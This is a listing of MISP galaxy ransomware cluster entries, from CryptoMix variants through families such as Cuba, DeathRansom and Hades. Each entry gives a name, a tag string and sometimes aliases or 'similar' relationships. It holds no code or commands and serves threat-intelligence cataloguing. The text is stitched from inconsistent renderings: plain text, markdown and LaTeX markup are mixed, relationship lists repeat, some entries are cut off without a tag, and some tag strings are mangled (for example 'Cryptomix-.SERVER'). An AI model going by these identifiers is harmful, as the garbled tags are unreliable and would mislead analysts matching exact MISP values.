• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
CryptoMix-Test

Ransomware

The tag is: `misp-galaxy:ransomware="CryptoMix-Test"`

CryptoMix-Test is also known as:

- Test CryptoMix

CryptoMix-Test has relationships with:

- similar: `misp-galaxy:ransomware="CryptoMix"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-0000"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Azer"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Backup"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-CK"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Coban"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-DLL"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Empty"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Error"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Exte"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-FILE"` with estimative-language:likelihood-probability="likely"
CryptoMix-Wallet

Ransomware

The tag is: `misp-galaxy:ransomware="CryptoMix-Wallet"`

CryptoMix-Wallet has relationships with:

- similar: `misp-galaxy:ransomware="CryptoMix-0000"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
**Cryptomix-WORK**

Ransomware

The tag is: `misp-galaxy:ransomware="Cryptomix-WORK"`

Cryptomix-WORK is also known as:

- WORK CryptoMix

Cryptomix-WORK has relationships with:

- similar: `misp-galaxy:ransomware="CryptoMix-0000"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Azer"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Backup"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-CK"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Coban"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-DLL"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Empty"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Error"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-Exte"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="Cryptomix-FILE"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:ransomware="CryptoMix-MOLE66"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Noob"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Ogonia"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Pirate"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Revenge"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="Cryptomix SERVER"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Shark"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-System"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Tastylock"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Test"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Wallet"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-x1881"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-XZZX"` with `estimative-language:likelihood-probability="likely"`
• similar: `misp-galaxy:ransomware="CryptoMix-Zayka"` with `estimative-language:likelihood-probability="likely"

**CryptoMix-x1881**

Ransomware

The tag is: `misp-galaxy:ransomware="CryptoMix-x1881"`

CryptoMix-x1881 is also known as:

  • x1881 CryptoMix

CryptoMix-x1881 has relationships with:

  • similar: `misp-galaxy:ransomware="CryptoMix-0000"` with `estimative-language:likelihood-probability="likely"`
  • similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with `estimative-language:likelihood-probability="likely"`
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
CryptoMix-XZZX

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-XZZX"

CryptoMix-XZZX is also known as:

- **XZZX CryptoMix**

CryptoMix-XZZX has relationships with:

- **similar:** misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- **similar:** misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-.SERVER" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Zayka**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-Zayka"*

CryptoMix-Zayka is also known as:

• Zayka CryptoMix

CryptoMix-Zayka has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

Crypton
Ransomware
The tag is: misp-galaxy:ransomware="Crypton"

CryptoPatronum
Ransomware
The tag is: misp-galaxy:ransomware="CryptoPatronum"

CryptoPokemon
Ransomware
The tag is: misp-galaxy:ransomware="CryptoPokemon"

CryptorBit
Ransomware
The tag is: misp-galaxy:ransomware="CryptorBit"

CryptoShield 2.0
Ransomware
The tag is: misp-galaxy:ransomware="CryptoShield 2.0"

CryptoSpider
Ransomware
The tag is: misp-galaxy:ransomware="CryptoSpider"

CryptoViki
Ransomware
The tag is: misp-galaxy:ransomware="CryptoViki"

Cryptre
Ransomware
The tag is: misp-galaxy:ransomware="Cryptre"

CrypTron
Ransomware
The tag is: misp-galaxy:ransomware="CrypTron"

Crysis XTBL
Ransomware
The tag is: misp-galaxy:ransomware="Crysis XTBL"

Crystal
Ransomware
The tag is: misp-galaxy:ransomware="Crystal"

CrystalCrypt
Ransomware
The tag is: misp-galaxy:ransomware="CrystalCrypt"

CryTekk
Ransomware
The tag is: misp-galaxy:ransomware="CryTekk"

CSP
Ransomware
The tag is: misp-galaxy:ransomware="CSP"

CTB-Locker Original
Ransomware
The tag is: *misp-galaxy:ransomware*="CTB-Locker Original"

**CTF**
Ransomware

The tag is: *misp-galaxy:ransomware*="CTF"

**Cuba**
Ransomware

The tag is: *misp-galaxy:ransomware*="Cuba"

**Curumim**
Ransomware

The tag is: *misp-galaxy:ransomware*="Curumim"

**CVLocker**
Ransomware

The tag is: *misp-galaxy:ransomware*="CVLocker"

**Cyber Police HT**
Ransomware

The tag is: *misp-galaxy:ransomware*="Cyber Police HT"

**CyberDrill2**
Ransomware

The tag is: *misp-galaxy:ransomware*="CyberDrill2"

**CyberResearcher**
Ransomware

The tag is: *misp-galaxy:ransomware*="CyberResearcher"

**CyberSCCP**
Ransomware
The tag is: misp-galaxy:ransomware="CyberSCCP"

CyberSoldier
Ransomware
The tag is: misp-galaxy:ransomware="CyberSoldier"

Cyclone
Ransomware
The tag is: misp-galaxy:ransomware="Cyclone"

CypherPy
Ransomware
The tag is: misp-galaxy:ransomware="CypherPy"

Cyspt
Ransomware
The tag is: misp-galaxy:ransomware="Cyspt"

Czech
Ransomware
The tag is: misp-galaxy:ransomware="Czech"

D00mEd
Ransomware
The tag is: misp-galaxy:ransomware="D00mEd"

D2+D
Ransomware
The tag is: misp-galaxy:ransomware="D2+D"

DarkKomet
Ransomware
The tag is: misp-galaxy:ransomware="DarkKomet"

**DarkLocker**

Ransomware

The tag is: misp-galaxy:ransomware="DarkLocker"

**DarkoderCryptor**

Ransomware

The tag is: misp-galaxy:ransomware="DarkoderCryptor"

**DataKeeper**

Ransomware

The tag is: misp-galaxy:ransomware="DataKeeper"

**Datebatut**

Ransomware

The tag is: misp-galaxy:ransomware="Datebatut"

**DCRTR**

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR"

**DCRTR-WDM**

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR-WDM"

**DCry**

Ransomware

The tag is: misp-galaxy:ransomware="DCry"

**DDE**

Ransomware
DeadSec-Crypto
Ransomware
The tag is: misp-galaxy:ransomware="DeadSec-Crypto"

DeathHiddenTear (Large&Small HT) >
Ransomware
The tag is: misp-galaxy:ransomware="DeathHiddenTear (Large&Small HT) > "

DeathNote
Ransomware
The tag is: misp-galaxy:ransomware="DeathNote"

DeathRansom
Ransomware
The tag is: misp-galaxy:ransomware="DeathRansom"

DecryptIomega
Ransomware
The tag is: misp-galaxy:ransomware="DecryptIomega"

Decryption Assistant
Ransomware
The tag is: misp-galaxy:ransomware="Decryption Assistant"

DecService
Ransomware
The tag is: misp-galaxy:ransomware="DecService"

DecYourData
Ransomware
The tag is: misp-galaxy:ransomware="DecYourData"

**Defender**
Ransomware

The tag is: misp-galaxy:ransomware="Defender"

**Defray (Glushkov)**
Ransomware

The tag is: misp-galaxy:ransomware="Defray (Glushkov)"

**Deos**
Ransomware

The tag is: misp-galaxy:ransomware="Deos"

**Desktop**
Ransomware

The tag is: misp-galaxy:ransomware="Desktop"

**Diamond**
Ransomware

The tag is: misp-galaxy:ransomware="Diamond"

**DilmaLocker**
Ransomware

The tag is: misp-galaxy:ransomware="DilmaLocker"

**Dishwasher**
Ransomware

The tag is: misp-galaxy:ransomware="Dishwasher"

**District**
Ransomware
The tag is: misp-galaxy:ransomware="District"

**DMA Locker 1.0-2.0-3.0**
Ransomware
The tag is: misp-galaxy:ransomware="DMA Locker 1.0-2.0-3.0"

**DMA Locker 4.0**
Ransomware
The tag is: misp-galaxy:ransomware="DMA Locker 4.0"

**DMALocker Imposter**
Ransomware
The tag is: misp-galaxy:ransomware="DMALocker Imposter"

**Dodger**
Ransomware
The tag is: misp-galaxy:ransomware="Dodger"

**DolphinTear**
Ransomware
The tag is: misp-galaxy:ransomware="DolphinTear"

**Donald Trump**
Ransomware
The tag is: misp-galaxy:ransomware="Donald Trump"

**Donation1**
Ransomware
The tag is: misp-galaxy:ransomware="Donation1"

**Done**
Ransomware
The tag is: *misp-galaxy:ransomware*="Done"

**Dont_Worry**

Ransomware

The tag is: *misp-galaxy:ransomware*="Dont_Worry"

**DotNoData**

Ransomware

The tag is: *misp-galaxy:ransomware*="DotNoData"

**DotZeroCMD**

Ransomware

The tag is: *misp-galaxy:ransomware*="DotZeroCMD"

**Dr. Fucker**

Ransomware

The tag is: *misp-galaxy:ransomware*="Dr. Fucker"

**Dr. Jimbo**

Ransomware

The tag is: *misp-galaxy:ransomware*="Dr. Jimbo"

**Drakos**

Ransomware

The tag is: *misp-galaxy:ransomware*="Drakos"

**DriedSister**

Ransomware

The tag is: *misp-galaxy:ransomware*="DriedSister"

**Dviide**

Ransomware
eBayWall
Ransomware
The tag is: misp-galaxy:ransomware="eBayWall"

EbolaRnsmwr
Ransomware
The tag is: misp-galaxy:ransomware="EbolaRnsmwr"

ECLR
Ransomware
The tag is: misp-galaxy:ransomware="ECLR"

EggLocker
Ransomware
The tag is: misp-galaxy:ransomware="EggLocker"

Ekati demo tool
Ransomware
The tag is: misp-galaxy:ransomware="Ekati demo tool"

Enc1
Ransomware
The tag is: misp-galaxy:ransomware="Enc1"

EncoderCSL
Ransomware
The tag is: misp-galaxy:ransomware="EncoderCSL"

EnCrypt
Ransomware
The tag is: misp-galaxy:ransomware="EnCrypt"

**EncryptedBatch**

Ransomware

The tag is: misp-galaxy:ransomware="EncryptedBatch"

**EncryptServer2018**

Ransomware

The tag is: misp-galaxy:ransomware="EncryptServer2018"

**EnybenyCrypt**

Ransomware

The tag is: misp-galaxy:ransomware="EnybenyCrypt"

**EOEO**

Ransomware

The tag is: misp-galaxy:ransomware="EOEO"

**Epoblockl**

Ransomware

The tag is: misp-galaxy:ransomware="Epoblockl"

**Erica2020**

Ransomware

The tag is: misp-galaxy:ransomware="Erica2020"

**Eris**

Ransomware

The tag is: misp-galaxy:ransomware="Eris"

**Estemani**

Ransomware
Eternal
Ransomware
The tag is: misp-galaxy:ransomware="Eternal"

Eternity
Ransomware
The tag is: misp-galaxy:ransomware="Eternity"

Euclid
Ransomware
The tag is: misp-galaxy:ransomware="Euclid"

Evasive HT
Ransomware
The tag is: misp-galaxy:ransomware="Evasive HT"

Evolution
Ransomware
The tag is: misp-galaxy:ransomware="Evolution"

Executioner
Ransomware
The tag is: misp-galaxy:ransomware="Executioner"

ExecutionerPlus
Ransomware
The tag is: misp-galaxy:ransomware="ExecutionerPlus"

Exocrypt XTC
Ransomware
The tag is: \textit{misp-galaxy:ransomware="Exocrypt XTC"}

\textbf{ExoLock}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="ExoLock"}

\textbf{ExpBoot}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="ExpBoot"}

\textbf{Explorer}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="Explorer"}

\textbf{Extortion Scam}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="Extortion Scam"}

Extortion Scam is also known as:

- Sextortion Scam

\textbf{Extractor}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="Extractor"}

\textbf{EyLamo}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="EyLamo"}

\textbf{EZDZ}

Ransomware

The tag is: \textit{misp-galaxy:ransomware="EZDZ"}
Fabiansomware

Ransomware

The tag is: misp-galaxy:ransomware="Fabiansomware"

Facebook HT

Ransomware

The tag is: misp-galaxy:ransomware="Facebook HT"

Faizal

Ransomware

The tag is: misp-galaxy:ransomware="Faizal"

Fake Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Fake Cerber"

Fake DMA

Ransomware

The tag is: misp-galaxy:ransomware="Fake DMA"

FartPlz

Ransomware

The tag is: misp-galaxy:ransomware="FartPlz"

FBLocker

Ransomware

The tag is: misp-galaxy:ransomware="FBLocker"

FCP

Ransomware

The tag is: misp-galaxy:ransomware="FCP"
FCrypt
ransomware
The tag is: misp-galaxy:ransomware="FCrypt"

FCT
ransomware
The tag is: misp-galaxy:ransomware="FCT"

Fenrir
ransomware
The tag is: misp-galaxy:ransomware="Fenrir"

File Ripper
ransomware
The tag is: misp-galaxy:ransomware="File Ripper"

FileFuck
ransomware
The tag is: misp-galaxy:ransomware="FileFuck"

FilesL0cker
ransomware
The tag is: misp-galaxy:ransomware="FilesL0cker"

Final
ransomware
The tag is: misp-galaxy:ransomware="Final"

FindZip
ransomware
The tag is: misp-galaxy:ransomware="FindZip"
Flatcher3
ransomware
The tag is: misp-galaxy:ransomware="Flatcher3"

Fluffy-TAR
ransomware
The tag is: misp-galaxy:ransomware="Fluffy-TAR"

Foxy
ransomware
The tag is: misp-galaxy:ransomware="Foxy"

FreeMe
ransomware
The tag is: misp-galaxy:ransomware="FreeMe"

Freshdesk
ransomware
The tag is: misp-galaxy:ransomware="Freshdesk"

Frog
ransomware
The tag is: misp-galaxy:ransomware="Frog"

FrozrLock
ransomware
The tag is: misp-galaxy:ransomware="FrozrLock"

FRS
ransomware
The tag is: misp-galaxy:ransomware="FRS"
FScrypt
ransomware

The tag is: misp-galaxy:ransomware="FScrypt"

FuckTheSystem
ransomware

The tag is: misp-galaxy:ransomware="FuckTheSystem"

FuxSocy Encryptor
ransomware

The tag is: misp-galaxy:ransomware="FuxSocy Encryptor"

Galacti-Crypter
ransomware

The tag is: misp-galaxy:ransomware="Galacti-Crypter"

GameOver
ransomware

The tag is: misp-galaxy:ransomware="GameOver"

Geminis3
ransomware

The tag is: misp-galaxy:ransomware="Geminis3"

Gendarmerie
ransomware

The tag is: misp-galaxy:ransomware="Gendarmerie"

Genobot
ransomware

The tag is: misp-galaxy:ransomware="Genobot"
GermanWiper
ransomware
The tag is: misp-galaxy:ransomware="GermanWiper"

GhosTEncryptor
ransomware
The tag is: misp-galaxy:ransomware="GhosTEncryptor"

GhostHammer
ransomware
The tag is: misp-galaxy:ransomware="GhostHammer"

Gibberish
ransomware
The tag is: misp-galaxy:ransomware="Gibberish"

Gibon
ransomware
The tag is: misp-galaxy:ransomware="Gibon"

Giyotin
ransomware
The tag is: misp-galaxy:ransomware="Giyotin"

GoCryptoLocker
ransomware
The tag is: misp-galaxy:ransomware="GoCryptoLocker"

Godra
ransomware
The tag is: misp-galaxy:ransomware="Godra"
GoGoogle
ransomware
The tag is: misp-galaxy:ransomware="GoGoogle"

GoHack
ransomware
The tag is: misp-galaxy:ransomware="GoHack"

Golden Axe
ransomware
The tag is: misp-galaxy:ransomware="Golden Axe"

Gomme
ransomware
The tag is: misp-galaxy:ransomware="Gomme"

GonnaCry Ransmware
ransomware
The tag is: misp-galaxy:ransomware="GonnaCry Ransmware"

Goofed HT
ransomware
The tag is: misp-galaxy:ransomware="Goofed HT"

GoRansom POC
ransomware
The tag is: misp-galaxy:ransomware="GoRansom POC"

Gorgon
ransomware
The tag is: misp-galaxy:ransomware="Gorgon"
Gotcha

ransomware

The tag is: misp-galaxy:ransomware="Gotcha"

GottaCry

ransomware

The tag is: misp-galaxy:ransomware="GottaCry"

GPAA

ransomware

The tag is: misp-galaxy:ransomware="GPAA"

GPGQwerty

ransomware

The tag is: misp-galaxy:ransomware="GPGQwerty"

Craftul

ransomware

The tag is: misp-galaxy:ransomware="Craftul"

Greystars

ransomware

The tag is: misp-galaxy:ransomware="Greystars"

GrodexCrypt

ransomware

The tag is: misp-galaxy:ransomware="GrodexCrypt"

GrujaRSorium

ransomware

The tag is: misp-galaxy:ransomware="GrujaRSorium"
Gruxer

ransomware

The tag is: misp-galaxy:ransomware="Gruxer"

GusCrypter

ransomware

The tag is: misp-galaxy:ransomware="GusCrypter"

GX40

ransomware

The tag is: misp-galaxy:ransomware="GX40"

H34rtBl33d

ransomware

The tag is: misp-galaxy:ransomware="H34rtBl33d"

HackdoorCrypt3r

ransomware

The tag is: misp-galaxy:ransomware="HackdoorCrypt3r"

Hades

ransomware

The tag is: misp-galaxy:ransomware="Hades"

Hades has relationships with:

- similar: misp-galaxy:ransomware="WildFire Locker" with estimative-language:likelihood-probability="likely"

Hakbit

ransomware

The tag is: misp-galaxy:ransomware="Hakbit"
HappyCrypter

ransomware

The tag is: misp-galaxy:ransomware="HappyCrypter"

Haze

ransomware

The tag is: misp-galaxy:ransomware="Haze"

HCrypto

ransomware

The tag is: misp-galaxy:ransomware="HCrypto"

HELP@AUSI

ransomware

The tag is: misp-galaxy:ransomware="HELP@AUSI"

HelpDCFile

ransomware

The tag is: misp-galaxy:ransomware="HelpDCFile"

HelpMe

ransomware

The tag is: misp-galaxy:ransomware="HelpMe"

Hermes837

ransomware

The tag is: misp-galaxy:ransomware="Hermes837"

HermesVirus HT

ransomware

The tag is: misp-galaxy:ransomware="HermesVirus HT"
Heropoint

ransomware

The tag is: misp-galaxy:ransomware="Heropoint"

HiddenBeer

ransomware

The tag is: misp-galaxy:ransomware="HiddenBeer"

Honor

ransomware

The tag is: misp-galaxy:ransomware="Honor"

Horros

ransomware

The tag is: misp-galaxy:ransomware="Horros"

Hydra

ransomware

The tag is: misp-galaxy:ransomware="Hydra"

IGotYou

ransomware

The tag is: misp-galaxy:ransomware="IGotYou"

iGZa4C

ransomware

The tag is: misp-galaxy:ransomware="iGZa4C"

ILElection2020

ransomware

The tag is: misp-galaxy:ransomware="ILElection2020"
Ims00ry
ransomware
The tag is: misp-galaxy:ransomware="Ims00ry"

ImSorry
ransomware
The tag is: misp-galaxy:ransomware="ImSorry"

Incanto
ransomware
The tag is: misp-galaxy:ransomware="Incanto"

Indrik
ransomware
The tag is: misp-galaxy:ransomware="Indrik"

InducVirus
ransomware
The tag is: misp-galaxy:ransomware="InducVirus"

InfinityLock
ransomware
The tag is: misp-galaxy:ransomware="InfinityLock"

InfoDot
ransomware
The tag is: misp-galaxy:ransomware="InfoDot"

INPIVX
ransomware
The tag is: misp-galaxy:ransomware="INPIVX"
InsaneCrypt
ransomware
